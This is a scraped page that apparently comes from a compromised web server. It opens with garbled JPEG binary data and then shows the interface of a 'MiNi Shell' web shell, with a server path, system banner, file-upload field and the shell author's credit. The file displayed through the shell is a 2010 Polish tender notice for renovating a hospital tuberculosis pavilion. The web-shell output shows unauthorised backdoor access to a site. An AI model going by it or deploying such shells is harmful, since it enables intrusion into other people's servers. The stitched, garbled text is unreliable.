JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100802/234628-N-2010.html

<p class="kh_header"><b>Jaroszowiec: Remont Pawilonu Gruźlicy</b><br>
<b>Numer ogłoszenia: 234628 - 2010; data zamieszczenia: 02.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Chorób Płuc w Jaroszowcu , ul. Kolejowa 1a, 32-312 Jaroszowiec, woj. małopolskie, tel. 032 6428090 w. 53, 6428031w.53, faks 032 6428100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wschp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Pawilonu Gruźlicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana w zadaniu pn.: Remont Pawilonu Gruźlicy w Wojewódzkim Szpitalu Chorób Płuc w Jaroszowcu obejmująca wykonanie remontu w istniejącym parterowym budynku o powierzchni zabudowy 1088 m2  i powierzchni użytkowej 795,5 m2.
W UDOSTĘPNIONYM PROJEKCIE BUDOWLANYM POMIESZCZENIA PRZEZNACZONE DO REMONTU OZNACZONO LITERĄ A.  

Szczegółowy zakres robót objętych niniejszym zamówieniem został określony w załącznikach do niniejszej specyfikacji - dokumentacja projektowa wielobranżowa wraz z przedmiarami robót oraz szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót - stanowiącymi  załącznik nr 1 specyfikacji również w wersji elektronicznej. W w/w dokumentacji należy uwzględnić wprowadzone zmiany, o których mowa w pkt.3 ppkt.2 i 6 SIWZ.
	Foldery załącznika nr 1 specyfikacji stanowią:
1)	Projekt Budowlany - Remont i rozbudowa Pawilonu gruźlicy w Wojewódzkim Szpitalu Chorób Płuc w Jaroszowcu,
2)	Architektura
-	Projekt Wykonawczy
-	Przedmiar Robót Budowlanych- Remont Budynek A
-	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
W ZAKRESIE PROJEKTU WYKONAWCZEGO ARCHITEKTURY -USTALONO ZAKRES ROBÓT BUDOWLANYCH- ZGODNIE Z DOKUMENTACJĄ - ZA WYJĄTKIEM: WYKONANIA SUFITÓW PODWIESZONYCH W KORYTARZACH, KTÓRE NA TYM ETAPIE ROBÓT NIE NALEŻY WYCENIAĆ,  NA KAŻDYM KORYTARZU  NALEŻY RÓWNIEŻ ZAINSTALOWAĆ TYLKO PO JEDNYM  ŚWIETLIKU, NATOMIAST POMIESZCZENIE A36 ŁAZIENKA PERSONELU MOŻE POZOSTAĆ ZGODNIE ZE STANEM ISTNIEJĄCYM.
3)	Wewnętrzna instalacja wod - kan i p. poż
1)	Projekt Wykonawczy
2)	Przedmiar Robót - Remont Budynek A
3)	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
4)	Wewnętrzna instalacja c.o.
-	Projekt Wykonawczy
-	Przedmiar Robót - Remont Budynek A
-	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
5)	Wewnętrzna instalacja wentylacji mechanicznej
-	Projekt Wykonawczy
-	Przedmiar Robót - Remont Budynek A
-	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
6)	Wewnętrzne instalacje elektryczne
-	Projekt Wykonawczy
-	Przedmiar Robót - Remont Budynek A
-	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
	W ZAKRESIE PROJEKTU WYKONAWCZEGO  - WEWNĘTRZNE INSTALACJE ELEKTRYCZNE
 	 -NALEŻY UWZGLĘDNIĆ TYLKO WYKONANIE ORUROWANIA. 
7)	Zewnętrznych instalacji sanitarnych
1.	Projekt Wykonawczy
2.	Przedmiar Robót dla Remontu budynku A
3.	Specyfikacja Techniczna Wykonania i Odbiory Robót Budowlanych
	Dokumentacja projektowa będąca podstawą opisu przedmiotu niniejszego zamówienia ze względów praktycznych została opublikowana na stronie Zamawiającego w postaci odrębnego pliku, stanowiącego załącznik do specyfikacji istotnych warunków zamówienia, który zawiera wszelkie niezbędne dla Wykonawcy dokumenty, uzgodnienia, opisy i rysunki.
	Wersja papierowa dokumentacji dostępna do wglądu w siedzibie Zamawiającego (vide pkt.XIII siwz).
4.	Opis zamówienia: 
1)	Zamawiający nie dopuszcza możliwości składania ofert częściowych,
2)	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego 
	w załącznikach do specyfikacji zostaną odrzucone.
3)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4)	Zamawiający dopuszcza możliwość wykonania części niniejszego zamówienia przez podwykonawców (art.36 ust. 4 ustawy). Wykonawca zobowiązany jest wskazać 
w ofercie, która część niniejszego zamówienia będzie wykonana przez podwykonawców,
5)	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt.6.

5.	Warunki dodatkowe dotyczące  przedmiotu zamówienia:
1)	Wykonawca przystępujący do postępowania gwarantuje, że posiada wszelkie 	wymagane zezwolenia w zakresie wykonania przedmiotu zamówienia.
2)	Zaleceniem jest, aby Wykonawcy przed złożeniem oferty dokonał wizji lokalnej, w celu 	zapoznania się z terenem budowy oraz zakresem prac objętych niniejszym 	zamówieniem.
3)	Wykonawca zobowiązany jest przedstawić Zamawiający harmonogram rzeczowo-	finansowy robót objętych zakresem zamówienia do 7 dni od podpisania umowy. 	Harmonogram robót uzgodniony i zatwierdzony przez Zamawiającego stanowić będzie 	integralną część umowy.
4)	Wykonawca zobowiązany będzie udzielić Zamawiającemu, co najmniej 24-	miesięcznej gwarancji na wykonane roboty budowlane, natomiast na materiały i 	urządzenia zgodnie z deklaracją ich producenta. Okres gwarancji rozpoczyna się od 	dnia odbioru końcowego robót.
5)	Wykonawca wniesie zabezpieczenie należytego wykonania umowy w wysokości 5 % 	wynagrodzenia brutto należnego z tytułu wykonania umowy.
a)	Zabezpieczenie należytego wykonania umowy może zostać wniesione w 	pieniądzu, w poręczeniach	bankowych lub poręczeniach spółdzielczej kasy 	oszczędnościowo-kredytowej, w gwarancjach bankowych, w gwarancjach 	ubezpieczeniowych, w poręczeniach udzielanych przez podmioty, o których 	mowa w  art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu 	Polskiej Agencji Rozwoju Przedsiębiorczości lub zgodnie z zapisami art.148 	ust.2 Ustawy Pzp.
b)	W przypadku należytego wykonania robót 70 % zabezpieczenia zostanie 	zwrócone lub zwolnione w ciągu 30 dni po ostatecznym odbiorze robót 	potwierdzonym protokołem odbioru robót, a pozostała część tj. 30 % zostanie 	zwolniona lub zwrócona w ciągu 14 dni po upływie okresu rękojmi, który 	wynosi 3 lata od daty odbioru końcowego robót.
c)	W przypadku nienależytego wykonania zamówienia zabezpieczenie wraz z 	powstałymi odsetkami staje się własnością Zamawiającego i będzie 	wykorzystane do zgodnego z umową wykonania robót i do pokrycia roszczeń z 	tytułu rękojmi za wykonane roboty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zmówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnie z zapisami art. 67 ust.1 pkt.6 Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.31.00.00-3, 45.30.00.00-0, 45.33.00.00-9, 45.33.12.10-1, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium.
1)	Kwota wadium wynosi: 10.000,00 zł. 
2)	Wadium wnosi się przed upływem terminu na składanie ofert.
3)	Wadium może być wnoszone w jednej lub kilku następujących formach:
	 pieniądzu;
	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy 			oszczędnościowo-kredytowej,  z tym,  że poręczenie kasy jest zawsze 		poręczeniem pieniężnym;
	 Gwarancjach bankowych;
	 Gwarancjach ubezpieczeniowych;
	 Poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 	pkt. 2 	ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji 	Rozwoju  Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
	Gwarancje i poręczenia winny zostać złożone zamawiającemu wyłącznie
	 w formie dokumentu oryginalnego.
4)	Wadium wniesione w pieniądzu należy wpłacić na konto: 49 8591 0007 0020 0055 8240 0001. Krakowski Bank Spółdzielczy z dopiskiem, (jakiego postępowania dotyczy) w terminie do dnia 16.08.2010r. do godz.12:00 a kopię dowodu wpłaty dołączyć do oferty.
5)	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6)	Wykonawca w zależności od wybranej formy wadium oryginał dołącza do oferty.
7)	Wadium powinno obejmować cały okres związania ofertą.
8)	Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto Zamawiającego.
9)	Wykonawca, który nie wniósł wadium, w tym na przedłużony okres związania ofertą lub nie zgodził się na przedłużenie okresu związania ofertą zgodnie z art. 24 ust.2 pkt. 2 ustawy Prawo zamówień publicznych zostanie wykluczony z przedmiotowego postępowania.
10)	Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia zobowiązany jest do wykazania, iż wykonał min. 1 zadanie z zakresu remontu obiektów  użyteczności publicznej 	o przestani zabudowy min. 2 000 m3 i wartości min. 500 000,00 zł  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.Na potwierdzenie spełnienia tego warunków należy do oferty załączyć:
- Wykaz podobnych robót wraz z dokumentami potwierdzenia (zgodnie z załącznikiem nr 6 do SIWZ).Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia zobowiązany jest do wykazania, iż dysponuje kierownikami robót branżowych- ogólnobudowlanych, sanitarnych i 	elektrycznych- z wymaganymi uprawnieniami 	min. 5 lat i przynależnością do RIIB. Na potwierdzenie spełnienia tego warunków należy do oferty załączyć:Wykaz osób i oświadczenie o dyspozycji właściwymi kierownikami robót (zgodnie z załącznikiem nr 5 do SIWZ).
Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów wg kryteriów spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia zobowiązany jest do wykazania, iż 	dysponuje płynnością finansową na kwotę min.  500 000,00 zł.oraz posiadają ubezpieczenie z tytułu prowadzonej działalności gospodarczej na 	sumę ubezpieczenia min. 500 000, 00 zł.,Na potwierdzenie spełnienia tego warunków należy do oferty załączyć:Informację z banku lub kasy o posiadaniu środków lub zdolności kredytowej oraz opłaconą polisę z tytułu prowadzonej działalności gospodarczej.
Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> sekretariat Zamawiającego w godz. 08:00 - 14:35 (poniedziałek -piątek), lub na pisemny wniosek zostanie przesłana ,cena obejmować będzie w takim przypadku koszt jej druku i przekazania.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 12:00, miejsce: Wojewódzkim Szpitalu Chorób Płuc w Jaroszowcu przy ul. Kolejowej 1 A ,  32-312 Jaroszowiec - Sekretariat I piętro Budynku administracyjnego w terminie do dnia 17.08.2010 r. do godz.12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com